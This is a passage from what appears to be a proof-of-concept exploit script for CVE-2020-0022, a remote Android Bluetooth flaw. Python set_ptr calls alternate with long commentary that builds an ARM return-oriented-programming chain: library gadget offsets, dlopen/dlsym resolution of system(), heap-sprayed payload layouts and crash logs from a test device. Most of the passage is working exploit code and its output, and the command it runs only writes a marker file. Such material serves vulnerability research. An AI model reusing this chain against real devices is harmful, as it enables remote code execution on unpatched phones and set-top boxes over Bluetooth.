        07-24 13:40:31.280  6330  6330 F DEBUG   :     #01 pc 000033b7  /system/bin/linker (__dl__ZL10dlopen_extPKciPK17android_dlextinfoPKv+66)
        07-24 13:40:31.280  6330  6330 F DEBUG   :     #02 pc 89e42bba  <unknown>

        After the dlopen function the registers contains:
        
        - R0       = 9f002101       = RTLD_LAZY handle
        - R4       = b208e4b4       = first payload value  + 0x4  = address of second payload + 0x0 = address to load with increment before in gadget 2
        - R5       = dead0001       = first payload value  + 0x8
        - R7       = b208e4b4       = first payload value  + 0xC  = address of second payload + 0x0 = address of gadget 1
        - R15 (PC) = dead0004 + 0x2 = second payload value + 0x18
        
        We got the RTLD_LAZY handle in R0
        
        We now need to call dlsym function to get the libc system function address
        
        The dlsym function take the 2 parameters "void *handle" and "const char *symbol" to retrieve the function address:   
        void *dlsym(void *handle, const char *symbol); 
        
        The function call is as follow:
        addr = (long) dlsym (handle, "system");

        We already set R0 with the RTLD_LAZY handle we now need R1 with the address of a 'system' string + NULL byte

        We now need a gadget that load the address of the 'system' string to R1
        
        Gadget 4:
        0x0014af70 : ldmib r5, {r1, r3, r4, r8, ip, lr, pc} ^
        
        By setting R5 to second payload value + 0x14 - 0x4 for the increment before this gadget will load:
        
        - R5       = R5 + 0x4  = second payload value + 0x14
        - R1       = R5 + 0x8  = second payload value + 0x14
        - R3       = R5 + 0xC  = second payload value + 0x18 = address of gadget 3
        - R4       = R5 + 0x10 = second payload value + 0x1C = address of dlopen function
        - R8       = R5 + 0x14 = second payload value + 0x20
        - R12 (IP) = R5 + 0x1C = second payload value + 0x24
        - R14 (LR) = R5 + 0x1C = second payload value + 0x28
        - R15 (PC) = R5 + 0x20 = second payload value + 0x2C

        This gadget allow to load R1 with second payload value + 0x14 and control LR and PC with second payload value + 0x28 and + 0x2C

        We will place the 'system' string + NULL byte in the second payload + 0x30 in order to let some space for next gadgets
        
        - second payload value + 0x30 = 'syst' string
        - second payload value + 0x34 = 'em' string + 2 NULL bytes
        
        Reminder for gadget 3:
        0x0013d3f0 : ldmib ip, {r1, r2, r3, ip, lr, pc} ^
        """

        # Set LR for gadget 3: Place the address of gadget 4 in second payload value + 0x18
        set_ptr( second_payload_ptr, 0x18, bluetooth_library_base_address + 0x0014af70, payload=2)

        # Set R5 for gadget 4: Place the address of second payload + 0x14 - 0x4 for the increment beforein first payload value + 0x8
        set_ptr( first_payload_ptr, 0x8, second_payload_base + 0x14 - 0x4, payload=1)
        
        # Place 'syst' string in second payload value + 0x30
        set_ptr( second_payload_ptr, 0x30, 0x74737973, payload=2)

        # Place 'em' + NULL string in second payload value + 0x34
        set_ptr( second_payload_ptr, 0x34, 0x00006d65, payload=2)
        
        # Set R1 for gadget 4: Place the address of 'system' string which is in second payload + 0x30 in second payload + 0x14
        set_ptr( second_payload_ptr, 0x14, second_payload_base + 0x30, payload=2)

        """
        The target crash with following log:

        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        Found link transmit data buffer queue pointer 0 at 0xa940dbc4
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x8f31ab29
        HCI: Found bte_hh_evt function at 0x8f2bd429
        HCI: Found bluetooth library base address at 0x8f245000
        Building the payloads...
        Adding shell command "cat /dev/zero | echo 'Target Exploited' > /data/local/tmp/cve-2020-0022-poc" of length 76 at 0xa940db80 in second payload
        First payload:
          0x00: dead0000 | 0x04: a940db14 | 0x08: a940db24 | 0x0c: a940db14
          0x10: 8f2e7098 | 0x14: dead0001 | 0x18: dead0002 | 0x1c: dead0003
        Second payload:
          0x00 : a940db14 : 8f2e7a38 | 0x04 : a940db18 : 00000000 | 0x08 : a940db1c : 00000001 | 0x0c : a940db20 : a940db18
          0x10 : a940db24 : 8f3823f0 | 0x14 : a940db28 : a940db44 | 0x18 : a940db2c : 8f38ff70 | 0x1c : a940db30 : 8f25a2e0
          0x20 : a940db34 : dead0004 | 0x24 : a940db38 : dead0005 | 0x28 : a940db3c : dead0006 | 0x2c : a940db40 : dead0007
          0x30 : a940db44 : 74737973 | 0x34 : a940db48 : 00006d65 | 0x38 : a940db4c : dead0008 | 0x3c : a940db50 : dead0009
          0x40 : a940db54 : dead000a | 0x44 : a940db58 : dead000b | 0x48 : a940db5c : dead000c | 0x4c : a940db60 : dead000d
          0x50 : a940db64 : dead000e | 0x54 : a940db68 : dead000f | 0x58 : a940db6c : dead0010 | 0x5c : a940db70 : dead0011
          0x60 : a940db74 : dead0012 | 0x64 : a940db78 : dead0013 | 0x68 : a940db7c : dead0014 | 0x6c : a940db80 : 20746163
          0x70 : a940db84 : 7665642f | 0x74 : a940db88 : 72657a2f | 0x78 : a940db8c : 207c206f | 0x7c : a940db90 : 6f686365
          0x80 : a940db94 : 61542720 | 0x84 : a940db98 : 74656772 | 0x88 : a940db9c : 70784520 | 0x8c : a940dba0 : 74696f6c
          0x90 : a940dba4 : 20276465 | 0x94 : a940dba8 : 642f203e | 0x98 : a940dbac : 2f617461 | 0x9c : a940dbb0 : 61636f6c
          0xa0 : a940dbb4 : 6d742f6c | 0xa4 : a940dbb8 : 76632f70 | 0xa8 : a940dbbc : 30322d65 | 0xac : a940dbc0 : 302d3032
          0xb0 : a940dbc4 : 2d323230 | 0xb4 : a940dbc8 : 00636f70
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xa940db14
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (3/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-26 00:52:55.673  5471  5506 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0004 in tid 5506 (bt_workqueue)
        07-26 00:52:55.762  5604  5604 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-26 00:52:55.762  5604  5604 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-26 00:52:55.762  5604  5604 F DEBUG   : Revision: '0'
        07-26 00:52:55.762  5604  5604 F DEBUG   : ABI: 'arm'
        07-26 00:52:55.763  5604  5604 F DEBUG   : pid: 5471, tid: 5506, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-26 00:52:55.763  5604  5604 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0004
        07-26 00:52:55.763  5604  5604 F DEBUG   :     r0 dc89229d  r1 a940db44  r2 00000000  r3 8f38ff70
        07-26 00:52:55.763  5604  5604 F DEBUG   :     r4 8f25a2e0  r5 a940db24  r6 00000000  r7 a940db14
        07-26 00:52:55.763  5604  5604 F DEBUG   :     r8 dead0004  r9 8df7d340  sl 8df7d338  fp 00000001
        07-26 00:52:55.763  5604  5604 F DEBUG   :     ip dead0005  sp 8df7cfd8  lr dead0006  pc dead0004  cpsr 00000010
        07-26 00:52:55.764  5604  5604 F DEBUG   : 
        07-26 00:52:55.764  5604  5604 F DEBUG   : backtrace:
        07-26 00:52:55.764  5604  5604 F DEBUG   :     #00 pc dead0004  <unknown>
        07-26 00:52:55.764  5604  5604 F DEBUG   :     #01 pc dead0002  <unknown>
        
        After the gadget 4 the registers contains:
        
        - R0       = dc89229d       = RTLD_LAZY handle
        - R1       = a940db44       = second payload value + 0x14 = address of second payload + 0x30 = address of 'system' string
        - R3       = 8f38ff70       = second payload value + 0x18 = address of gadget 4
        - R4       = 8f25a2e0       = second payload value + 0x1C = address of address of dlopen function
        - R5       = a940db24       = first payload value  + 0x8  = address of second payload + 0x10 = address of gadget 2
        - R7       = a940db14       = first payload value  + 0xC  = address of second payload + 0x0  = address of gadget 1
        - R8       = dead0004       = second payload value + 0x20
        - R12 (IP) = dead0005       = second payload value + 0x24
        - R14 (LR) = dead0006       = second payload value + 0x28
        - R15 (PC) = dead0004 + 0x3 = second payload value + 0x2C
       
        We control R0 with RTLD_LAZY, R1 with address of 'system' string, LR and PC
        We can now call dlsym function to get the libc system function address and control LR of the function
        
        For this we will set following registers:
        
        - R14 (LR) = second payload value + 0x28 = address of gadget 5
        - R15 (PC) = second payload value + 0x2C = address of dlsym function in relocation table
       
        .plt:0x000152EC ; void *dlsym(void *handle, const char *name)
        .plt:0x000152EC dlsym                                   ; CODE XREF: sub_AEB84+2Cp
        .plt:0x000152EC                                         ; sub_AEB84+44p ...
        .plt:0x000152EC                 ADRL            R12, 0x1A22F4
        .plt:0x000152F4                 LDR             PC, [R12,#(dlsym_ptr - 0x1A22F4)]! ; __imp_dlsym
        
        Reminder for gadget 4:
        0x0014af70 : ldmib r5, {r1, r3, r4, r8, ip, lr, pc} ^
        """

        # Set PC for gadget 4: Place the address of dlsym function in second payload value + 0x2C
        set_ptr( second_payload_ptr, 0x2C, bluetooth_library_base_address + 0x000152EC, payload=2)

        """
        The target crash with following log:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        Found link transmit data buffer queue pointer 0 at 0xa778dbc4
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x8d872b29
        HCI: Found bte_hh_evt function at 0x8d815429
        HCI: Found bluetooth library base address at 0x8d79d000
        Building the payloads...
        Adding shell command "cat /dev/zero | echo 'Target Exploited' > /data/local/tmp/cve-2020-0022-poc" of length 76 at 0xa778db80 in second payload
        First payload:
          0x00: dead0000 | 0x04: a778db14 | 0x08: a778db24 | 0x0c: a778db14
          0x10: 8d83f098 | 0x14: dead0001 | 0x18: dead0002 | 0x1c: dead0003
        Second payload:
          0x00 : a778db14 : 8d83fa38 | 0x04 : a778db18 : 00000000 | 0x08 : a778db1c : 00000001 | 0x0c : a778db20 : a778db18
          0x10 : a778db24 : 8d8da3f0 | 0x14 : a778db28 : a778db44 | 0x18 : a778db2c : 8d8e7f70 | 0x1c : a778db30 : 8d7b22e0
          0x20 : a778db34 : dead0004 | 0x24 : a778db38 : dead0005 | 0x28 : a778db3c : dead0006 | 0x2c : a778db40 : 8d7b22ec
          0x30 : a778db44 : 74737973 | 0x34 : a778db48 : 00006d65 | 0x38 : a778db4c : dead0007 | 0x3c : a778db50 : dead0008
          0x40 : a778db54 : dead0009 | 0x44 : a778db58 : dead000a | 0x48 : a778db5c : dead000b | 0x4c : a778db60 : dead000c
          0x50 : a778db64 : dead000d | 0x54 : a778db68 : dead000e | 0x58 : a778db6c : dead000f | 0x5c : a778db70 : dead0010
          0x60 : a778db74 : dead0011 | 0x64 : a778db78 : dead0012 | 0x68 : a778db7c : dead0013 | 0x6c : a778db80 : 20746163
          0x70 : a778db84 : 7665642f | 0x74 : a778db88 : 72657a2f | 0x78 : a778db8c : 207c206f | 0x7c : a778db90 : 6f686365
          0x80 : a778db94 : 61542720 | 0x84 : a778db98 : 74656772 | 0x88 : a778db9c : 70784520 | 0x8c : a778dba0 : 74696f6c
          0x90 : a778dba4 : 20276465 | 0x94 : a778dba8 : 642f203e | 0x98 : a778dbac : 2f617461 | 0x9c : a778dbb0 : 61636f6c
          0xa0 : a778dbb4 : 6d742f6c | 0xa4 : a778dbb8 : 76632f70 | 0xa8 : a778dbbc : 30322d65 | 0xac : a778dbc0 : 302d3032
          0xb0 : a778dbc4 : 2d323230 | 0xb4 : a778dbc8 : 00636f70
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xa778db14
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (3/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-26 08:15:20.365 11896 11930 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0004 in tid 11930 (bt_workqueue)
        07-26 08:15:20.447 11976 11976 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-26 08:15:20.447 11976 11976 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-26 08:15:20.447 11976 11976 F DEBUG   : Revision: '0'
        07-26 08:15:20.447 11976 11976 F DEBUG   : ABI: 'arm'
        07-26 08:15:20.447 11976 11976 F DEBUG   : pid: 11896, tid: 11930, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-26 08:15:20.447 11976 11976 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0004
        07-26 08:15:20.447 11976 11976 F DEBUG   :     r0 a9d91c09  r1 00004001  r2 00000000  r3 a778db44
        07-26 08:15:20.447 11976 11976 F DEBUG   :     r4 8d7b22e0  r5 a778db24  r6 00000026  r7 a778db14
        07-26 08:15:20.447 11976 11976 F DEBUG   :     r8 dead0004  r9 00000006  sl 00000002  fp 8da198d4
        07-26 08:15:20.447 11976 11976 F DEBUG   :     ip 00007000  sp 8c5fcfa0  lr ab0d642f  pc dead0004  cpsr 80000010
        07-26 08:15:20.564 11976 11976 F DEBUG   : 
        07-26 08:15:20.564 11976 11976 F DEBUG   : backtrace:
        07-26 08:15:20.564 11976 11976 F DEBUG   :     #00 pc dead0004  <unknown>
        07-26 08:15:20.564 11976 11976 F DEBUG   :     #01 pc 0000342b  /system/bin/linker (__dl__Z10dlsym_implPvPKcS1_PKv+70)
        07-26 08:15:20.564 11976 11976 F DEBUG   :     #02 pc 000a9121  /system/lib/libchrome.so (_ZN4base13WaitableEvent9SignalOneEv+46)
        07-26 08:15:20.564 11976 11976 F DEBUG   :     #03 pc 0001b829  /system/lib/libc.so (eventfd_write+24)
        07-26 08:15:20.564 11976 11976 F DEBUG   :     #04 pc 0012bff5  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z14semaphore_postP11semaphore_t+72)
        07-26 08:15:20.564 11976 11976 F DEBUG   :     #05 pc 00128e1b  /system/vendor/lib/hw/bluetooth.marvellberlin.so (_Z19fixed_queue_dequeueP13fixed_queue_t+78)
        07-26 08:15:20.564 11976 11976 F DEBUG   :     #06 pc 000fa334  <anonymous:8c503000>

        After the dlsym function the registers contains:
        
        - R0       = a9d91c09 = system function address
        - R3       = a778db44 = second payload value + 0x14 = address of second payload + 0x30 = address of 'system' string
        - R4       = 8d7b22e0 = second payload value + 0x1C = address of dlopen function
        - R5       = a778db24 = first payload value  + 0x8  = address of second payload + 0x10 = address of gadget 2
        - R7       = a778db14 = first payload value  + 0xC  = address of second payload + 0x0  = address of gadget 1
        - R8       = dead0004 = second payload value + 0x20
        - R15 (PC) = dead0004 + 0x2 = second payload value + 0x28 (LR before dlsym function)
       
        We got the system function address in R0
 
        We now need a gadget that move R0 with the system function address to an other register
        
        Gadget 6:
        0x001603fc : mul r3, r2, r0 ; sub r1, r1, r3 ; bx lr

        This gadget set R3 with R2 * R0 this mean we need to set R2 to 0x00000001 in order to get R3 = R0 = system function address
        
        Before calling gadget 5 we need a gadget that load values from R8 in order to control R2, LR and PC
        
        Gadget 5:
        0x000958d4 : ldmib r7, {r1, r2, r3, r8, sb, fp, ip, lr, pc} ^
        
        By reusing R7 with address of second payload + 0x0 this gadget will load with an increment before:
        
        - R7       = R7 + 0x0  = second payload value + 0x0  = address to load in gadget 5
        - R1       = R7 + 0x4  = second payload value + 0x4  = NULL for dlopen            
        - R2       = R7 + 0x8  = second payload value + 0x8  = RTLD_LAZY = 0x1 for dlopen 
        - R3       = R7 + 0xC  = second payload value + 0xC  = address of gadget 1        
        - R8       = R7 + 0x10 = second payload value + 0x10 = address of gadget 2        
        - R9  (SB) = R7 + 0x14 = second payload value + 0x14 = address of 'system' string 
        - R11 (FP) = R7 + 0x18 = second payload value + 0x18 = address of gadget 4        
        - R12 (IP) = R7 + 0x1C = second payload value + 0x1C = address of dlopen function  
        - R14 (LR) = R7 + 0x20 = second payload value + 0x20                              
        - R15 (PC) = R7 + 0x24 = second payload value + 0x24                              

        This gadget allow to load R2 with second payload value + 0x8 = RTLD_LAZY = 0x1 and control LR and PC with second payload value + 0x20 and + 0x24
        It allow to save some words in the second paylaod
               
        Reminder for gadget 4:
        0x0014af70 : ldmib r5, {r1, r3, r4, r8, ip, lr, pc} ^
        """

        # Set LR for gadget 4: Place the address of gadget 5 in second payload value + 0x28
        set_ptr( second_payload_ptr, 0x28, bluetooth_library_base_address + 0x000958d4, payload=2)

        """
        The target crash with following log:
        
        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x91797b29
        HCI: Found bte_hh_evt function at 0x9173a429
        HCI: Found bluetooth library base address at 0x916c2000
        Building the payloads...
        Adding shell command "cat /dev/zero | echo 'Target Exploited' > /data/local/tmp/cve-2020-0022-poc" of length 76 at 0xab80e520 in second payload
        First payload:
          0x00: dead0000 | 0x04: ab80e4b4 | 0x08: ab80e4c4 | 0x0c: ab80e4b4
          0x10: 91764098 | 0x14: dead0001 | 0x18: dead0002 | 0x1c: dead0003
        Second payload:
          0x00 : ab80e4b4 : 91764a38 | 0x04 : ab80e4b8 : 00000000 | 0x08 : ab80e4bc : 00000001 | 0x0c : ab80e4c0 : ab80e4b8
          0x10 : ab80e4c4 : 917ff3f0 | 0x14 : ab80e4c8 : ab80e4e4 | 0x18 : ab80e4cc : 9180cf70 | 0x1c : ab80e4d0 : 916d72e0
          0x20 : ab80e4d4 : dead0004 | 0x24 : ab80e4d8 : dead0005 | 0x28 : ab80e4dc : 917578d4 | 0x2c : ab80e4e0 : 916d72ec
          0x30 : ab80e4e4 : 74737973 | 0x34 : ab80e4e8 : 00006d65 | 0x38 : ab80e4ec : dead0006 | 0x3c : ab80e4f0 : dead0007
          0x40 : ab80e4f4 : dead0008 | 0x44 : ab80e4f8 : dead0009 | 0x48 : ab80e4fc : dead000a | 0x4c : ab80e500 : dead000b
          0x50 : ab80e504 : dead000c | 0x54 : ab80e508 : dead000d | 0x58 : ab80e50c : dead000e | 0x5c : ab80e510 : dead000f
          0x60 : ab80e514 : dead0010 | 0x64 : ab80e518 : dead0011 | 0x68 : ab80e51c : dead0012 | 0x6c : ab80e520 : 20746163
          0x70 : ab80e524 : 7665642f | 0x74 : ab80e528 : 72657a2f | 0x78 : ab80e52c : 207c206f | 0x7c : ab80e530 : 6f686365
          0x80 : ab80e534 : 61542720 | 0x84 : ab80e538 : 74656772 | 0x88 : ab80e53c : 70784520 | 0x8c : ab80e540 : 74696f6c
          0x90 : ab80e544 : 20276465 | 0x94 : ab80e548 : 642f203e | 0x98 : ab80e54c : 2f617461 | 0x9c : ab80e550 : 61636f6c
          0xa0 : ab80e554 : 6d742f6c | 0xa4 : ab80e558 : 76632f70 | 0xa8 : ab80e55c : 30322d65 | 0xac : ab80e560 : 302d3032
          0xb0 : ab80e564 : 2d323230 | 0xb4 : ab80e568 : 00636f70
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xab80e4b4
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (4/20)                                                                                                                            
        ADB: Found interesting crash !!!
        07-26 08:22:39.392  3819  3856 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0004 in tid 3856 (bt_workqueue)
        07-26 08:22:39.754  3936  3936 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-26 08:22:39.755  3936  3936 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-26 08:22:39.755  3936  3936 F DEBUG   : Revision: '0'
        07-26 08:22:39.755  3936  3936 F DEBUG   : ABI: 'arm'
        07-26 08:22:39.755  3936  3936 F DEBUG   : pid: 3819, tid: 3856, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-26 08:22:39.755  3936  3936 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0004
        07-26 08:22:39.755  3936  3936 F DEBUG   :     r0 accaac09  r1 00000000  r2 00000001  r3 ab80e4b8
        07-26 08:22:39.755  3936  3936 F DEBUG   :     r4 916d72e0  r5 ab80e4c4  r6 00000000  r7 ab80e4b4
        07-26 08:22:39.755  3936  3936 F DEBUG   :     r8 917ff3f0  r9 ab80e4e4  sl 90487338  fp 9180cf70
        07-26 08:22:39.755  3936  3936 F DEBUG   :     ip 916d72e0  sp 90486fd8  lr dead0004  pc dead0004  cpsr 00000010
        07-26 08:22:39.756  3936  3936 F DEBUG   : 
        07-26 08:22:39.756  3936  3936 F DEBUG   : backtrace:
        07-26 08:22:39.757  3936  3936 F DEBUG   :     #00 pc dead0004  <unknown>

        In the gadget 5 the registers contains:
        
        - R0       = accaac09       = system function address
        - R1       = 00000000       = second payload value + 0x4  = NULL
        - R2       = 00000001       = second payload value + 0x8  = RTLD_LAZY = 0x1
        - R3       = ab80e4b8       = second payload value + 0xC  = address of second payload + 0x4 = NULL
        - R4       = 916d72e0       = second payload value + 0x1C = address of dlopen function
        - R5       = ab80e4c4       = first payload value  + 0x8  = address of second payload + 0x10 = address for gadget 2
        - R7       = ab80e4b4       = first payload value  + 0xC  = address of second payload + 0x0  = address of gadget 1
        - R8       = 917ff3f0       = second payload value + 0x10 = address of gadget 2
        - R9  (SB) = ab80e4e4       = second payload value + 0x14 = address of second payload + 0x30 = address of 'system' string'
        - R11 (FP) = 9180cf70       = second payload value + 0x18 = address of gadget 4
        - R12 (IP) = 916d72e0       = second payload value + 0x1C = address of dlopen
        - R14 (LR) = dead0004       = second payload value + 0x20
        - R15 (PC) = dead0004 + 0x1 = second payload value + 0x24
        
        We control R0 with system function address, R2 with 0x1, LR and PC
        
        We can now call the gadget 6 to move R0 with system function address to R3
        
        Gadget 6:
        0x001603fc : mul r3, r2, r0 ; sub r1, r1, r3 ; bx lr

        Reminder for gadget 5:
        0x000958d4 : ldmib r7, {r1, r2, r3, r8, sb, fp, ip, lr, pc} ^
        """

        # Set PC for gadget 5: Place the address of gadget 6 in second payload value + 0x24
        set_ptr( second_payload_ptr, 0x24, bluetooth_library_base_address + 0x001603fc, payload=2)

        """
        The target crash with following log:

        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x8a749b29
        HCI: Found bluetooth library base address at 0x8a674000
        Building the payloads...
        Adding shell command "cat /dev/zero | echo 'Target Exploited' > /data/local/tmp/cve-2020-0022-poc" of length 76 at 0xa468dd40 in second payload
        First payload:
          0x00: dead0000 | 0x04: a468dcd4 | 0x08: a468dce4 | 0x0c: a468dcd4
          0x10: 8a716098 | 0x14: dead0001 | 0x18: dead0002 | 0x1c: dead0003
        Second payload:
          0x00 : a468dcd4 : 8a716a38 | 0x04 : a468dcd8 : 00000000 | 0x08 : a468dcdc : 00000001 | 0x0c : a468dce0 : a468dcd8
          0x10 : a468dce4 : 8a7b13f0 | 0x14 : a468dce8 : a468dd04 | 0x18 : a468dcec : 8a7bef70 | 0x1c : a468dcf0 : 8a6892e0
          0x20 : a468dcf4 : dead0004 | 0x24 : a468dcf8 : 8a7d43fc | 0x28 : a468dcfc : 8a7098d4 | 0x2c : a468dd00 : 8a6892ec
          0x30 : a468dd04 : 74737973 | 0x34 : a468dd08 : 00006d65 | 0x38 : a468dd0c : dead0005 | 0x3c : a468dd10 : dead0006
          0x40 : a468dd14 : dead0007 | 0x44 : a468dd18 : dead0008 | 0x48 : a468dd1c : dead0009 | 0x4c : a468dd20 : dead000a
          0x50 : a468dd24 : dead000b | 0x54 : a468dd28 : dead000c | 0x58 : a468dd2c : dead000d | 0x5c : a468dd30 : dead000e
          0x60 : a468dd34 : dead000f | 0x64 : a468dd38 : dead0010 | 0x68 : a468dd3c : dead0011 | 0x6c : a468dd40 : 20746163
          0x70 : a468dd44 : 7665642f | 0x74 : a468dd48 : 72657a2f | 0x78 : a468dd4c : 207c206f | 0x7c : a468dd50 : 6f686365
          0x80 : a468dd54 : 61542720 | 0x84 : a468dd58 : 74656772 | 0x88 : a468dd5c : 70784520 | 0x8c : a468dd60 : 74696f6c
          0x90 : a468dd64 : 20276465 | 0x94 : a468dd68 : 642f203e | 0x98 : a468dd6c : 2f617461 | 0x9c : a468dd70 : 61636f6c
          0xa0 : a468dd74 : 6d742f6c | 0xa4 : a468dd78 : 76632f70 | 0xa8 : a468dd7c : 30322d65 | 0xac : a468dd80 : 302d3032
          0xb0 : a468dd84 : 2d323230 | 0xb4 : a468dd88 : 00636f70
        Prepare to connect to the target via bluetooth with your smartphone
        HCI: Spraying second payload at 0xa468dcd4
        Connect to the target via bluetooth with your smartphone                                                                                                        
        HCI: Triggering the exploit with first payload... (1/3)
        ADB: Bluetooth deamon crashed (14/20)                                                                                                                           
        ADB: Found interesting crash !!!
        07-26 08:34:14.472  5536  5575 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdead0004 in tid 5575 (bt_workqueue)
        07-26 08:34:14.632  5641  5641 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
        07-26 08:34:14.632  5641  5641 F DEBUG   : Build fingerprint: 'BouyguesTelecom/BouygtelTV/HMB4213H:8.0.0/CALIFORNIE/6.30.13:user/release-keys'
        07-26 08:34:14.632  5641  5641 F DEBUG   : Revision: '0'
        07-26 08:34:14.633  5641  5641 F DEBUG   : ABI: 'arm'
        07-26 08:34:14.633  5641  5641 F DEBUG   : pid: 5536, tid: 5575, name: bt_workqueue  >>> com.android.bluetooth <<<
        07-26 08:34:14.633  5641  5641 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdead0004
        07-26 08:34:14.633  5641  5641 F DEBUG   :     r0 a7067c09  r1 58f983f7  r2 00000001  r3 a7067c09
        07-26 08:34:14.633  5641  5641 F DEBUG   :     r4 8a6892e0  r5 a468dce4  r6 00000000  r7 a468dcd4
        07-26 08:34:14.633  5641  5641 F DEBUG   :     r8 8a7b13f0  r9 a468dd04  sl 89304338  fp 8a7bef70
        07-26 08:34:14.633  5641  5641 F DEBUG   :     ip 8a6892e0  sp 89303fd8  lr dead0004  pc dead0004  cpsr 00000010
        07-26 08:34:14.634  5641  5641 F DEBUG   : 
        07-26 08:34:14.634  5641  5641 F DEBUG   : backtrace:
        07-26 08:34:14.634  5641  5641 F DEBUG   :     #00 pc dead0004  <unknown>

        After the gadget 6 the registers contains:
        
        - R0       = a7067c09 = system function address
        - R1       = 00000000 = R1 - R3 = second payload value + 0x4 - system function address
        - R2       = 00000001 = second payload value + 0x8  = RTLD_LAZY = 0x1
        - R3       = a7067c09 = system function address
        - R4       = 8a6892e0 = second payload value + 0x1C = address of dlopen function
        - R5       = a468dce4 = first payload value  + 0x8  = address of second payload + 0x10 = address for gadget 2
        - R7       = a468dcd4 = first payload value  + 0xC  = address of second payload + 0x0  = address of gadget 1
        - R8       = 8a7b13f0 = second payload value + 0x10 = address of gadget 2
        - R9  (SB) = a468dd04 = second payload value + 0x14 = address of second payload + 0x30 = address of 'system' string'
        - R11 (FP) = 8a7bef70 = second payload value + 0x18 = address of gadget 4
        - R12 (IP) = 8a6892e0 = second payload value + 0x1C = address of dlopen
        - R14 (LR) = dead0004 = second payload value + 0x20
        - R15 (PC) = dead0004 = second payload value + 0x20 (LR before gadget 6)
        
        We now need to reload some registers in order to continue the ROP chain
        
        Gadget 7:
        0x000f09c8 : ldmib sb, {r0, r1, r4, r8, ip, lr, pc} ^
        
        By reusing R9 (SB) with second payload value + 0x14 this gadget will load:
        
        - R9 (SB)  = R9 (SB) + 0x0  = second payload value + 0x30 = 'syst' string
        - R0       = R9 (SB) + 0x4  = second payload value + 0x34 = 'em' string + 2 NULL bytes
        - R1       = R9 (SB) + 0x8  = second payload value + 0x38
        - R4       = R9 (SB) + 0xC  = second payload value + 0x3C
        - R8       = R9 (SB) + 0x10 = second payload value + 0x40
        - R12 (IP) = R9 (SB) + 0x14 = second payload value + 0x44
        - R14 (LR) = R9 (SB) + 0x18 = second payload value + 0x48
        - R15 (PC) = R9 (SB) + 0x1C = second payload value + 0x4C

        This gadget allow to load PC with second payload value + 0x30
        It don't control R0 and LR so we will need to use a new gadget to load R0 with address of shell command and control LR and PC
        
        Reminder for gadget 5:
        0x000958d4 : ldmib r7, {r1, r2, r3, r8, sb, fp, ip, lr, pc} ^
        """

        # Set LR for gadget 5: Place the address of gadget 7 in second payload value + 0x20
        set_ptr( second_payload_ptr, 0x20, bluetooth_library_base_address + 0x000f09c8, payload=2)

        """
        The target crash with following log:

        HCI: Got ACL connection handle: 0xb                                                                                                                             
        HCI: Getting link transmit data buffer queue pointer...
        Found link transmit data buffer queue pointer 0 at 0xb1d0dbc4
        HCI: Getting bluetooth library function pointers...
        HCI: Found SetDataAdvDataSender function at 0x97e03b29
        HCI: Found bte_hh_evt function at 0x97da6429
        HCI: Found bluetooth library base address at 0x97d2e000
        Building the payloads...
        Adding shell command "cat /dev/zero | echo 'Target Exploited' > /data/local/tmp/cve-2020-0022-poc" of length 76 at 0xb1d0db80 in second payload
        First payload:
          0x00: dead0000 | 0x04: b1d0db14 | 0x08: b1d0db24 | 0x0c: b1d0db14
          0x10: 97dd0098 | 0x14: dead0001 | 0x18: dead0002 | 0x1c: dead0003
        Second payload:
          0x00 : b1d0db14 : 97dd0a38 | 0x04 : b1d0db18 : 00000000 | 0x08 : b1d0db1c : 00000001 | 0x0c : b1d0db20 : b1d0db18
